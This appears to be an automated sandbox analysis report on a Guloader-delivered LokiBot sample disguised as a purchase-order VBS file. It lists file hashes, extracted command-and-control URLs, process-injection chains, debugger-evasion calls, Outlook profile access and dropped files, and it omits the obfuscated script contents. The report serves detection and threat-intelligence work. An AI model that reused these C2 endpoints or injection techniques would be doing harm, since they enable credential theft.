Analysis

max time kernel: 119s
max time network: 127s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 11/03/2024, 14:32

Static task: static1

Behavioral task: behavioral1
  Sample: PO 05-03-2024 AKTINA-CDS.vbs
  Resource: win7-20231129-en

Behavioral task: behavioral2
  Sample: PO 05-03-2024 AKTINA-CDS.vbs
  Resource: win10v2004-20240226-en
General

Target: PO 05-03-2024 AKTINA-CDS.vbs
Size: 23KB
MD5: d6695915f760321b845a2816f656e663
SHA1: 4b7059d4d43e11a86c3df728f362f4c8446dfc42
SHA256: 9e544c53dffc7c410220f17bc3a9f96f83f98a2bcdaa882183408d5194bf6a9e
SHA512: b5b9f34a1ecbfdc744564699b5588412296aac865de1439e9357af17c7ff64c0ddcd960bfb3adcafd014a052f077535c419d2a96e25d90552951a5152c89c724
SSDEEP: 384:jrgkau2izS+8ScLLSYxmdIPEwOcFtGiuMcXx5qeBmkgQvZTygL4fKnqvWpsToSFH:jrgkau2iu+8ScLLSYxwIPEwOcFtGiuM1
Malware Config

Extracted: lokibot
- https://sempersim.su/c7/fre.php
- http://kbfvzoboss.bid/alien/fre.php
- http://alphastand.trade/alien/fre.php
- http://alphastand.win/alien/fre.php
- http://alphastand.top/alien/fre.php
Signatures

Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  3     1920  WScript.exe
  6     1920  WScript.exe
  17    1136  powershell.exe

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  - Key opened: \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (Process: wab.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (Process: wab.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (Process: wab.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  flow  ioc
  9     drive.google.com
  10    drive.google.com
  19    drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  pid   Process
  2796  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   Process
  1136  powershell.exe
  2796  wab.exe

Suspicious use of SetThreadContext (1 IoC)
  - PID 1136 set thread context of 2796 (pid 1136, Process powershell.exe, procid_target 34)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  1212  powershell.exe
  1136  powershell.exe
  1136  powershell.exe

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   Process
  1136  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  - Token: SeDebugPrivilege (pid 1212, Process powershell.exe)
  - Token: SeDebugPrivilege (pid 1136, Process powershell.exe)

Suspicious use of WriteProcessMemory (20 IoCs)
  - PID 1920 wrote to memory of 1212 (pid 1920, Process WScript.exe, procid_target 28): 3 events
  - PID 1212 wrote to memory of 2872 (pid 1212, Process powershell.exe, procid_target 30): 3 events
  - PID 1212 wrote to memory of 1136 (pid 1212, Process powershell.exe, procid_target 32): 4 events
  - PID 1136 wrote to memory of 1804 (pid 1136, Process powershell.exe, procid_target 33): 4 events
  - PID 1136 wrote to memory of 2796 (pid 1136, Process powershell.exe, procid_target 34): 6 events

outlook_office_path (1 IoC)
  - Key opened: \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (Process: wab.exe)

outlook_win_path (1 IoC)
  - Key opened: \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (Process: wab.exe)
Processes

Image: C:\Windows\System32\WScript.exe
Command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID: 1920

  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1212

    Image: C:\Windows\system32\cmd.exe
    Command: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
    PID: 2872

    Image: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    Command: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]"
    - Blocklisted process makes network request
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1136

      Image: C:\Windows\SysWOW64\cmd.exe
      Command: "C:\Windows\system32\cmd.exe" /c set /A 115^^0
      PID: 1804

      Image: C:\Program Files (x86)\windows mail\wab.exe
      Command: "C:\Program Files (x86)\windows mail\wab.exe"
      - Accesses Microsoft Outlook profiles
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - outlook_office_path
      - outlook_win_path
      PID: 2796

MITRE ATT&CK Enterprise v15
Downloads

Filesize: 67KB
MD5: 753df6889fd7410a2e9fe333da83a429
SHA1: 3c425f16e8267186061dd48ac1c77c122962456e
SHA256: b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512: 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Filesize: 1KB
MD5: a266bb7dcc38a562631361bbf61dd11b
SHA1: 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256: df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512: 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Path: C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 344B
MD5: 211771b8306b4df71d2a1099cd2460e9
SHA1: d1ab514058c1e2058f0904fef16df876addce6be
SHA256: 0e4a23b253b8c9a9f73cc646259ddf001c9ac9c089a3727bb78df33552f37628
SHA512: e773bb71e4db65c68a5997d380068976facbcab97c03c9f0c2bcd6b0c5b7e821cbb1bc116e78e130805ce45bd9444db9931626168ca767dcd6b54a51d5e5b525

Path: C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 344B
MD5: f162ad07b9edfb1bddeb70b568f2466d
SHA1: bc033077f34e28deff7e99265c05a68cf93ab1c0
SHA256: e1a611bae1f29f2a467af83c6d42186742a43146eea12eee15d4e2995cd8831d
SHA512: 8ee786e70fefd98c67f7ddef244ea957e2e82b69207dd10274169e71685eb081c80c7c85898e81c8203ba4a5ab3ffe7bc31369dce1c19b59e845fb1bcb50e4e2

Path: C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize: 242B
MD5: ddcde6f00e701c39a183b23e268aa671
SHA1: fc1bcdc60cc8e9f5e37883539d20ea330edda727
SHA256: d88738ba308762b61429ac0b4be38b963ab91db5a91d37b00c1a6a05dd96dfd8
SHA512: 1e1bd6018888c7ee898fdfb252dac9bb4ae4898c1de254dd2c0fe88593180c03694b0368d97b5f8bf94340c67d04584de9754236d86999c7ce42e431b0f7b68b

Filesize: 175KB
MD5: dd73cead4b93366cf3465c8cd32e2796
SHA1: 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256: a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512: ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Path: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DQXVUI804L86F8K9D92.temp
Filesize: 7KB
MD5: ca01db601cb05e0bfb553367bd49d033
SHA1: a68268457978b2ff2d9d5329883b57709adf3f44
SHA256: 64c45a706f3d8ef66def539981f84534d395e9045359136a6d2c1e46d9e8c4f5
SHA512: 918c5370e72616e8c9de19fd1798145d9883886a39ab8752e1de4e145f27761ad464319eb17e50d470427d2b82c8fd957a619f5cc515f23f6ace11d74a8d130c